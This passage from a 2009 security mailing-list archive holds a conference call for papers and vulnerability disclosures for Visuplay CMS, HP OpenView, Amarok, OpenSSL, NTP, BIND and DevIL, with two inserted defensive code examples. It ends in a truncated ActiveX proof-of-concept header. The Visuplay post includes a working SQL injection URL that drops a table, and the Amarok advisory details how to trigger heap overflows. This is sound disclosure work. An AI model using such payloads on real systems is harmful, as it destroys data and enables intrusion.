venue: Langham Place Hotel

*SyScan'09 Singapore*
date: 2, 3 July 2009
venue: Novotel Clarke Quay Hotel

*SyScan'09 Taipei*
date: 7, 8 July 2009
venue: NTUH International Convention Center

*CFP COMMITTEE*
The Call for Papers committee for SyScan'09 comprises the following
personnel:

1. Thomas Lim - Organiser of SyScan and CEO of COSEINC
2. Dave Aitel - Founder and CTO of Immunitysec
3. Marc Maiffret - Ex-Founder and Chief Hacking Officer of eEye
4. Matthew "Shok" Conover - Symantec

The CFP committee will review all submissions and determine the final
list of speakers for SyScan'09.

*CONFERENCE TOPICS*
The focus for SyScan'09 will include the following:

*Operating Systems*
- Vista
- Linux
*Mobile Devices/Embedded systems*
- SmartPhones
- PDAs
- Game Consoles
*Web 2.0*
- Web services
- PHP
- .Net/.asp
- Web applications
*Networking/Telecommunication*
- VoIP
- 3G/3.5G network
- IPv6
- WLAN/WiFi
- GPRS
*New Technologies*
- Chrome
- IE8
- Android
- iPhone
*Virtualization*
*Malware/Rootkits*
*BotNets*
*Security Policy/Best Practices*
*Legislation*
*Any topics that will catch the attention of the CFP committee and/or
the world.*

*TRAINING TOPICS*
SyScan'09 training topics will focus on the following areas:

*Web Applications*
*Networks*
*Securing Windows/Linux Systems*
*Databases*
*Storage*
*Secure Programming/Development*

*PRIVILEGES*
Speakers' Privileges:
- Return economy class air-ticket for one person.
- 3 nights of accommodation.
- Breakfast, lunch and dinner during conference.
- After-conference party.
- A very healthy dose of alcohol and fun.
- S$500 cash for speakers with brand new presentations.

Trainers' Privileges:
- 50% of net profit of class.
- 2 nights of accommodation (conference) (applicable for Singapore only).
- After-conference party.
- A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the 
difference between the total fee collected for each class and the total 
expenses incurred for each class. The expenses of each class would 
include the return economy air-ticket of the trainer, 3 nights of 
accommodation (training) and the rental of the training venue.


*CFP SUBMISSION*
CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously or training classes conducted previously.
2) Proposed presentation/training title, category, synopsis and 
description.
3) Contact Information (full name, alias, handler, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary 
requirement).
4) Employment and/or affiliations information.
5) Any significant presentation and educational/training 
experience/background.
6) Why is your material different or innovative or significant or an 
important tutorial?

Please note that all speakers will be allocated 50 minutes of 
presentation time. Any speakers that require more time must inform the 
CFP committee during the CFP submission.

Training classes will be 2 full days. Please inform the CFP committee if 
your class is shorter or longer than 2 days during your CFP submission.

All submissions must be in English and in PDF format only. The more 
information you provide, the better the chance for selection. Please 
send submission to cfp@syscan.org.


*IMPORTANT DATES*
*Shanghai*
Final CFP Submission - 28th February 2009.
Notification of Acceptance - 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) - 15th
April 2009

*Hong Kong*
Final CFP Submission - 28th February 2009.
Notification of Acceptance - 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) - 15th
April 2009.

*Singapore*
Final CFP Submission - 31st March 2009.
Notification of Acceptance - 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) - 8th May
2009.

*Taipei*
Final CFP Submission - 31st March 2009.
Notification of Acceptance - 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) - 8th May
2009.


*OTHER INFORMATION*
Please feel free to visit SyScan website to get a feel what this
conference is all about - SHARE AND HAVE FUN!

By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd. 
the rights to reproduce, distribute, advertise and show your 
presentation including but not limited to http://www.syscan.org, printed 
and/or electronic advertisements, and all other mediums.

-- 
Thank you
Thomas Lim
Organiser
SyScan'09
www.syscan.org

Date: Mon, 12 Jan 2009 04:03:05 -0700
From: joseph.giron13@gmail.com
To: bugtraq@securityfocus.com
Subject: Visuplay CMS SQL injection vulnerability

http://www.visuplay.com

Visuplay is a web dev company that offers a CMS that goes with its websites that helps it be managed (after all, that is what a CMS does, right?)

Anywho, you can add your own SQL code to various query areas throughout the CMS like news_article.php and content_page.php. Here's an example that seems to work:
http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7

As stated in the URL, this will drop the news table, but other stuff can be done no doubt. They even run the CMS on their own site, so I wouldn't be surprised if it were vulnerable as well. 

I emailed the devs, and am awaiting a response. Happy hacking!

To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02392 SSRT071481 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS)
Date: Mon, 12 Jan 2009 10:17:50 -0800

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01607558
Version: 1

HPSBMA02392 SSRT071481 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-01-12
Last Updated: 2009-01-12

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2007-4349

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================
Reference         Base Vector                   Base Score
CVE-2007-4349     (AV:N/AC:M/Au:N/C:N/I:N/A:P)      4.3
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP has made patches available to resolve the vulnerabilities.

The patches are available from http://support.openview.hp.com/selfsolve/patches 

Note: The patches are not available from the HP IT Resource Center (ITRC). 

OV NNM v7.53 

Operating_System - HP-UX (IA)
Resolved in Patch - PHSS_38148 or subsequent
 
Operating_System - HP-UX (PA)
Resolved in Patch - PHSS_38147 or subsequent
 
Operating_System - Linux RedHatAS2.1 
Resolved in Patch - LXOV_00085 or subsequent
 
Operating_System - Linux RedHat4AS-x86_64 
Resolved in Patch - LXOV_00086 or subsequent
 
Operating_System - Solaris
Resolved in Patch - PSOV_03514 or subsequent
 
Operating_System - Windows
Resolved in Patch - NNM_01192 or subsequent
 


OV NNM v7.51 

Upgrade to NNM v7.53 and install the patches listed above. Patch bundles for upgrading from NNM v7.51 to NNM v5.53 are available here: ftp://nnm_753:update@hprc.external.hp.com/ 


OV NNM v7.01 

Operating_System - HP-UX (PA)
Resolved in Patch - PHSS_38761 or subsequent
 
Operating_System - Solaris
Resolved in Patch - PSOV_03516 or subsequent
 
Operating_System - Windows
Resolved in Patch - NNM_01194 or subsequent
 


MANUAL ACTIONS: Yes - NonUpdate 
Install the patches listed in the Resolution 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51 and 7.53 
HP-UX B.11.31 
HP-UX B.11.23 (IA) 
HP-UX B.11.23 (PA) 
HP-UX B.11.11 
============
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the patches listed in the Resolution 
URL: http://support.openview.hp.com/selfsolve/patches 

For HP-UX OV NNM 7.01 
HP-UX B.11.11 
============
OVNNMgr.OVNNM-RUN,fr=B.07.01.00
action: install the patches listed in the Resolution 
URL: http://support.openview.hp.com/selfsolve/patches 

END AFFECTED VERSIONS (for HP-UX)

HISTORY 
Version:1 (rev.1) - 12 January 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

© Copyright 2009 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Date: Sun, 11 Jan 2009 18:47:57 +0100
From: Tobias Klein <tk@trapkit.de>
To: bugtraq@securityfocus.com
Subject: [TKADV2009-002] Amarok Integer Overflow and Unchecked Allocation
 Vulnerabilities

Please find attached a detailed advisory of the vulnerabilities.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2009-002.txt

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:               Amarok Integer Overflow and Unchecked Allocation 
                        Vulnerabilities
Advisory ID:            TKADV2009-002
Revision:               1.0              
Release Date:           2009/01/11 
Last Modified:          2009/01/11
Date Reported:          2009/01/05
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      Amarok < version 2.0.1.1
Remotely Exploitable:   Yes
Locally Exploitable:    No 
Vendor URL:             http://amarok.kde.org/ 
Vendor Status:          Vendor has released an updated version
Patch development time: 7 days


======================
Vulnerability Details:
======================
Amarok contains several integer overflows and unchecked allocation 
vulnerabilities while parsing malformed Audible digital audio files. 
The vulnerabilities may be exploited by a (remote) attacker to execute 
arbitrary code in the context of Amarok.


==================
Technical Details:
==================
Source code file from Amarok 2.0: 
  amarok-2.0\src\metadata\audible\audibletag.cpp

[...]
bool Audible::Tag::readTag( FILE *fp, char **name, char **value)
{
    quint32 nlen;
    if ( fread(&nlen, sizeof(nlen), 1, fp) != 1 )    // [1]
        return false;

    nlen = ntohl(nlen);
    //fprintf(stderr, "tagname len=%x\n", (unsigned)nlen);
    *name = new char[nlen+1];                        // [2]
    (*name)[nlen] = '\0';                            // [4]

    quint32 vlen;
    if ( fread(&vlen, sizeof(vlen), 1, fp) != 1 )    // [5]
    {
        delete [] *name;
        *name = 0;
        return false;
    }

    vlen = ntohl(vlen);
    //fprintf(stderr, "tag len=%x\n", (unsigned)vlen);

    if ( fread(*name, nlen, 1, fp) != 1 )            // [3]
    {
        delete [] *name;
        *name = 0;
        return false;
    }

    *value = new char[vlen+1];                       // [6]
    (*value)[vlen] = '\0';                           // [8]

    if ( fread(*value, vlen, 1, fp) != 1 )           // [7]
    {
        delete [] *value;
        *value = 0;
        return false;
    }

[...]

Description of integer overflow #1 that leads to a heap buffer overflow:

[1] A user-defined value is extracted from the media file and stored in
    the unsigned int variable "nlen".
[2] In this line a heap buffer of "nlen+1" bytes is allocated. By supplying
    a value of 0xffffffff for "nlen", an integer overflow happens, resulting
    in the allocation of a very small heap buffer.
[3] The user-controlled value of "nlen" is used as a length specifier to
    copy user-controlled data from the media file into the previously
    allocated (small) heap buffer pointed to by "name". As "nlen" has a
    very large value (0xffffffff), the heap buffer is overflowed with
    user-controlled data of the media file. The exact number of bytes that
    get written beyond the heap buffer can be controlled by the length of
    the media file. This leads to a controllable heap overflow vulnerability.

Description of the unchecked allocation vulnerability #1 that may result in
an exploitable memory corruption condition:

[2] + [4] This code fails to check for a NULL pointer returned from a
          new[] statement. The resulting pointer is then dereferenced by
          the user-controlled value of "nlen" and an 8-bit value of 0x00
          is assigned to the dereferenced location. This issue can be
          exploited to overwrite an arbitrary memory location with the
          1-byte value 0x00. A malicious party may exploit this issue to
          execute arbitrary code by overwriting a sensitive memory location
          (such as a buffer length or boolean variable).

Description of integer overflow #2 that leads to a heap buffer overflow:

[5] A user-defined value is extracted from the media file and stored in
    the unsigned int variable "vlen".
[6] In this line a heap buffer of "vlen+1" bytes is allocated. By supplying
    a value of 0xffffffff for "vlen", an integer overflow happens, resulting
    in the allocation of a very small heap buffer.
[7] The user-controlled value of "vlen" is used as a length specifier to
    copy user-controlled data from the media file into the previously
    allocated (small) heap buffer pointed to by "value". As "vlen" has a
    very large value (0xffffffff), the heap buffer is overflowed with
    user-controlled data of the media file. The exact number of bytes that
    get written beyond the heap buffer can be controlled by the length of
    the media file. This leads to a controllable heap overflow vulnerability.

Description of the unchecked allocation vulnerability #2 that may result in
an exploitable memory corruption condition:

[6] + [8] This code fails to check for a NULL pointer returned from a
          new[] statement. The resulting pointer is then dereferenced by
          the user-controlled value of "vlen" and an 8-bit value of 0x00
          is assigned to the dereferenced location. This issue can be
          exploited to overwrite an arbitrary memory location with the
          1-byte value 0x00. A malicious party may exploit this issue to
          execute arbitrary code by overwriting a sensitive memory location
          (such as a buffer length or boolean variable).

In Amarok versions < 2.0 the source code of the vulnerable function is 
slightly different but suffers from the same vulnerabilities.


=========
Solution:
=========
  Upgrade to Amarok version 2.0.1.1


========
History:
========
  2009/01/05 - KDE Security notified using security@kde.org (no response)
  2009/01/08 - KDE Security notified a 2nd time 
  2009/01/09 - Response of the Amarok maintainers. Patch developed.
  2009/01/11 - New Amarok version released and public disclosure of 
               vulnerability details by Amarok maintainers
  2009/01/11 - Release date of this security advisory


========
Credits:
========
  Vulnerability found and advisory written by Tobias Klein.


===========
References:
===========
 [1] http://amarok.kde.org/de/node/600
 [2] http://www.trapkit.de/advisories/TKADV2009-002.txt


========
Changes:
========
  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release


===========
Disclaimer:
===========
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


==================
PGP Signature Key:
==================
  http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

  
Copyright 2009 Tobias Klein. All rights reserved.
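
The length handling described under "Technical Details" above, as an added example that is not part of the advisory and is not Amarok's code or its fix. It assumes the on-disk layout implied by the quoted readTag() (two big-endian 32-bit lengths, then the name bytes, then the value bytes); the names read_tag_checked, parse_sample and the kMaxTagLen cap are hypothetical.

```cpp
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Size the quoted code passes to new[]: a 32-bit "len + 1".
// For len == 0xffffffff the sum wraps to 0, so almost nothing is allocated.
static uint32_t alloc_size_32(uint32_t len) { return len + 1u; }

// Read one big-endian 32-bit integer; false on a short read.
static bool read_be32(std::FILE *fp, uint32_t &out) {
    unsigned char b[4];
    if (std::fread(b, 1, sizeof b, fp) != sizeof b) return false;
    out = (uint32_t(b[0]) << 24) | (uint32_t(b[1]) << 16) |
          (uint32_t(b[2]) << 8) | uint32_t(b[3]);
    return true;
}

// Bytes between the current position and end of file, or -1 on error.
static long bytes_remaining(std::FILE *fp) {
    long cur = std::ftell(fp);
    if (cur < 0 || std::fseek(fp, 0, SEEK_END) != 0) return -1;
    long end = std::ftell(fp);
    if (end < 0 || std::fseek(fp, cur, SEEK_SET) != 0) return -1;
    return end - cur;
}

enum class TagStatus { Ok, Truncated, TooLong };

// Hypothetical upper bound for one tag field, chosen for this example.
constexpr uint32_t kMaxTagLen = 64 * 1024;

// Reads one name/value tag. Both lengths come from the file, so they are
// validated against a cap and against the bytes actually present before
// any buffer is sized from them.
TagStatus read_tag_checked(std::FILE *fp, std::string &name, std::string &value) {
    uint32_t nlen = 0, vlen = 0;
    if (!read_be32(fp, nlen) || !read_be32(fp, vlen)) return TagStatus::Truncated;

    if (nlen > kMaxTagLen || vlen > kMaxTagLen) return TagStatus::TooLong;

    // The sum is computed in 64 bits, so it cannot wrap.
    long left = bytes_remaining(fp);
    if (left < 0 || uint64_t(nlen) + vlen > uint64_t(left)) return TagStatus::Truncated;

    // std::string owns the storage and knows its size; no manual "+1".
    std::string n(nlen, '\0'), v(vlen, '\0');
    if (nlen && std::fread(&n[0], 1, nlen, fp) != nlen) return TagStatus::Truncated;
    if (vlen && std::fread(&v[0], 1, vlen, fp) != vlen) return TagStatus::Truncated;

    // Outputs are only touched once the whole tag has been read.
    name.swap(n);
    value.swap(v);
    return TagStatus::Ok;
}

// Writes constructed sample bytes to a temporary file and parses one tag.
TagStatus parse_sample(const std::vector<unsigned char> &bytes,
                       std::string &name, std::string &value) {
    std::FILE *fp = std::tmpfile();
    if (!fp) return TagStatus::Truncated;
    if (!bytes.empty()) std::fwrite(bytes.data(), 1, bytes.size(), fp);
    std::rewind(fp);
    TagStatus st = read_tag_checked(fp, name, value);
    std::fclose(fp);
    return st;
}

int main() {
    // Constructed inputs, not taken from any real Audible file.
    std::vector<unsigned char> good = {0,0,0,5, 0,0,0,3,
                                       't','i','t','l','e','a','b','c'};
    std::vector<unsigned char> wrap = {0xff,0xff,0xff,0xff, 0,0,0,3,
                                       'x','y','z'};
    std::string n, v;
    std::printf("32-bit size for len 0xffffffff: %u\n",
                (unsigned)alloc_size_32(0xffffffffu));
    std::printf("good tag status: %d (%s=%s)\n",
                (int)parse_sample(good, n, v), n.c_str(), v.c_str());
    std::printf("0xffffffff length status: %d\n", (int)parse_sample(wrap, n, v));
    return 0;
}
```
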



From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 12 Jan 2009 21:03:29 +0100
Subject: [SECURITY] [DSA 1701-1] New OpenSSL packages fix cryptographic weakness

------------------------------------------------------------------------
Debian Security Advisory DSA-1701-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 12, 2009                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : openssl, openssl097
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-5077
Debian Bug     : 511196

It was discovered that OpenSSL does not properly verify DSA signatures
on X.509 certificates due to an API misuse, potentially leading to the
acceptance of incorrect X.509 certificates as genuine (CVE-2008-5077).

For the stable distribution (etch), this problem has been fixed in
version 0.9.8c-4etch4 of the openssl package, and version
0.9.7k-3.1etch2 of the openssl097 package.

For the unstable distribution (sid), this problem has been fixed in
version 0.9.8g-15.

The testing distribution (lenny) will be fixed soon.

We recommend that you upgrade your OpenSSL packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 12 Jan 2009 21:34:15 +0100
Subject: [SECURITY] [DSA 1702-1] New ntp packages fix cryptographic weakness

------------------------------------------------------------------------
Debian Security Advisory DSA-1702-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 12, 2009                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : ntp
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0021
Debian Bug     : 511227

It has been discovered that NTP, an implementation of the Network Time
Protocol, does not properly check the result of an OpenSSL function
for verifying cryptographic signatures, which may ultimately lead to
the acceptance of unauthenticated time information.  (Note that
cryptographic authentication of time servers is often not enabled in
the first place.)

For the stable distribution (etch), this problem has been fixed in
version 4.2.2.p4+dfsg-2etch1.

For the unstable distribution (sid), this problem has been fixed in
version 4.2.4p4+dfsg-8.

The testing distribution (lenny) will be fixed soon.

We recommend that you upgrade your ntp package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From - Mon Jan 12 17:32:16 2009
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 12 Jan 2009 22:27:18 +0100
Subject: [SECURITY] [DSA 1703-1] New bind9 packages fix cryptographic weakness

------------------------------------------------------------------------
Debian Security Advisory DSA-1703-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 12, 2009                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : bind9
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0025

It was discovered that BIND, an implementation of the DNS protocol
suite, does not properly check the result of an OpenSSL function which
is used to verify DSA cryptographic signatures.  As a result,
incorrect DNS resource records in zones protected by DNSSEC could be
accepted as genuine.

For the stable distribution (etch), this problem has been fixed in
version 9.3.4-2etch4.

For the unstable distribution (sid) and the testing distribution
(lenny), this problem will be fixed soon.

We recommend that you upgrade your BIND packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
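
The failure mode DSA-1703-1 describes, as an added example that is not code from the advisory, BIND or OpenSSL: OpenSSL verification calls such as DSA_do_verify() and EVP_VerifyFinal() return 1 for a valid signature, 0 for an invalid one and -1 on error, so a caller that treats the result as a boolean accepts the error case. toy_verify(), accept_flawed() and accept_strict() are hypothetical stand-ins, and the FNV tag they compare is not cryptography.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TOY_SIG_LEN 4  /* constructed signature size, for illustration */

/* Toy tag (32-bit FNV-1a). NOT cryptography: it only gives the stand-in
 * verifier something to compare so that all three outcomes can occur. */
static void toy_sign(const unsigned char *msg, size_t len,
                     unsigned char sig[TOY_SIG_LEN])
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < len; i++) {
        h ^= msg[i];
        h *= 16777619u;
    }
    for (int i = 0; i < TOY_SIG_LEN; i++)
        sig[i] = (unsigned char)(h >> (8 * i));
}

/* Hypothetical stand-in for a verification call. It follows the tri-state
 * convention documented for DSA_do_verify() and EVP_VerifyFinal():
 *    1  signature is valid
 *    0  signature is well-formed but does not match
 *   -1  error, e.g. the signature could not be processed at all */
static int toy_verify(const unsigned char *msg, size_t len,
                      const unsigned char *sig, size_t sig_len)
{
    unsigned char expect[TOY_SIG_LEN];

    if (sig == NULL || sig_len != TOY_SIG_LEN)
        return -1;                      /* malformed input: error, not 0 */
    toy_sign(msg, len, expect);
    return memcmp(sig, expect, TOY_SIG_LEN) == 0 ? 1 : 0;
}

/* Flawed caller: treats the result as a boolean, so only 0 is rejected
 * and the -1 error case falls through to "accepted". */
static int accept_flawed(const unsigned char *msg, size_t len,
                         const unsigned char *sig, size_t sig_len)
{
    if (!toy_verify(msg, len, sig, sig_len))
        return 0;
    return 1;
}

/* Hardened caller: only the explicit success value is accepted, so both
 * 0 and -1 lead to rejection. */
static int accept_strict(const unsigned char *msg, size_t len,
                         const unsigned char *sig, size_t sig_len)
{
    return toy_verify(msg, len, sig, sig_len) == 1;
}

int main(void)
{
    /* Constructed sample record; name and address are documentation values. */
    const unsigned char rec[] = "www.example.test. 3600 IN A 192.0.2.10";
    size_t n = sizeof rec - 1;
    unsigned char good[TOY_SIG_LEN], wrong[TOY_SIG_LEN];

    toy_sign(rec, n, good);
    memcpy(wrong, good, sizeof wrong);
    wrong[0] ^= 0xff;                   /* well-formed, but does not match */

    struct { const char *name; const unsigned char *sig; size_t len; } cases[] = {
        { "valid",     good,  TOY_SIG_LEN },
        { "mismatch",  wrong, TOY_SIG_LEN },
        { "malformed", good,  TOY_SIG_LEN - 2 },  /* truncated signature */
    };

    printf("%-10s %6s %7s %7s\n", "case", "verify", "flawed", "strict");
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-10s %6d %7d %7d\n", cases[i].name,
               toy_verify(rec, n, cases[i].sig, cases[i].len),
               accept_flawed(rec, n, cases[i].sig, cases[i].len),
               accept_strict(rec, n, cases[i].sig, cases[i].len));
    return 0;
}
```

When auditing callers of tri-state verification functions, the comparison to look for is `== 1` (or `<= 0` on the reject path); a bare `!result` or `result != 0` test is the pattern that lets the error value through.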

From - Tue Jan 13 11:32:17 2009
Date: Tue, 13 Jan 2009 10:22:32 +0100
Subject: Secunia Research: DevIL "iGetHdrHeader()" Buffer Overflow Vulnerabilities
From: Secunia Research <remove-vuln@secunia.com>

=====================================================================
                     Secunia Research 13/01/2009

       DevIL "iGetHdrHeader()" Buffer Overflow Vulnerabilities

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* DevIL 1.7.4.

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Moderately critical
Impact: System access
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"Developer's Image Library (DevIL) is a programmer's library to
develop applications with very powerful image loading capabilities,
yet is easy for a developer to learn and use.".

Product Link:
http://openil.sourceforge.net/

=====================================================================
4) Description of Vulnerability

Secunia Research has discovered two vulnerabilities in DevIL, which
can be exploited by malicious people to compromise an application
using the library.

The vulnerabilities are caused due to boundary errors within the
"iGetHdrHeader()" function in src-IL/src/il_hdr.c. These can be 
exploited to cause a stack-based buffer overflow when processing
specially crafted Radiance RGBE files.

Successful exploitation allows execution of arbitrary code.

=====================================================================
5) Solution

Fixed in the SVN repository.

=====================================================================
6) Time Table

09/01/2009 - Vendor notified.
10/01/2009 - Vendor response.
13/01/2009 - Public disclosure.

=====================================================================
7) Credits

Discovered by Stefan Cornelius, Secunia Research.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-5262 for the vulnerabilities.

=====================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-59/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Jan 13 11:42:17 2009
Subject: PDFBuilderX 2.2 Arbitrary File Overwrite
From: fakeperson7 <fakeperson7@tlen.pl>
Date: Tue, 13 Jan 2009 12:41:43 +0100

Alfons Luja 
========================================================================================================================


<b>
    Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite    <br/>
                         p0c                            <br/>
                     Alfons Luja                        <br/>
            Greetings to the eternal fans               <br/>
                      Tesw Eporue                       <br/>
                        -9002-                          <br/>
                         l00l                           <br/>
</b>
<object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object>
<script>
